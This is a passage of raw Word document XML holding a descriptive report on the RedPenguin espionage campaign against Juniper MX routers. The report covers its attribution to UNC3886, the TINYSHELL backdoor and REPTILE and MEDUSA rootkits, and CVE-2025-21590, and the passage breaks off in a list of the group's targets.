          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RedPenguin</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a cyber-espionage campaign targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Juniper MX Series routers</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> running </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Junos OS</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. The campaign is documented by the MITRE ATT&amp;CK framework as </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Campaign C0056</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is linked to the China-associated threat group </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNC3886</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. Its main goal was to gain long-term, stealthy access to network infrastructure for espionage and traffic monitoring. (</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="003168F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DDA267" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The campaign was discovered in </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>July 2024</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Juniper Networks’ Cybersecurity Research and Development team</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, with further investigation by </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mandiant</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. Researchers found that attackers had implanted malware directly into networking devices, allowing them to avoid detection by traditional endpoint security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC3D7C" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The attackers specifically targeted </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Juniper MX routers</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, which are widely used in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF7F63" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Telecommunications </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286BB6E" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Enterprise networks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D122DC" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical infrastructure environments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433318BB" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RedPenguin used customized versions of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TINYSHELL backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, along with rootkits such as </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>REPTILE</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MEDUSA</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. The malware was disguised as legitimate system processes and provided capabilities such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A48A15B" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote shell access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F62EC09" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">File transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105F627" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Packet sniffing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC10AC4" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted command-and-control communication </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6B774" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy tunneling </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678A419" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">One important aspect of the campaign was the exploitation of </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CVE-2025-21590</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, which helped attackers bypass Junos OS protections and inject malicious code into legitimate processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786831D2" w14:textId="0224DCDE" w:rsidR="0055266B" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack is significant because it shows how threat actors are increasingly targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>network infrastructure devices instead of traditional endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. By compromising routers, attackers can monitor network traffic, maintain persistence, and remain hidden for long periods. The campaign also demonstrates the growing sophistication of state-sponsored cyber-espionage operations against high-value sectors such as defense, telecom, and technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5A60C" w14:textId="12F64DBC" w:rsidR="00AD249E" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00AD249E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B677C" w14:textId="3301B67C" w:rsidR="00AD249E" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00AD249E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D808247" wp14:editId="481A33AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>622935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5581650" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="2124211672" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5581650" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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FFB5DB8" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:49.05pt;margin-top:-3.45pt;width:439.5pt;height:33.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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006537E8" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Threat Actor / Group Association – UNC3886</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7890EBD6" w14:textId="303CF2CD" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNC3886</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a China-linked cyber-espionage group that has been active since at least </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2022</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. According to the MITRE ATT&amp;CK group page, the group is known for targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defense, telecommunications, and technology organizations</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the United States and Asia-Pacific regions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB47045" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The group specializes in attacking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743E6E7" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge devices and routers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDEB9B" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualization platforms such as VMware ESXi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12448249" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical infrastructure systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946F06D" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
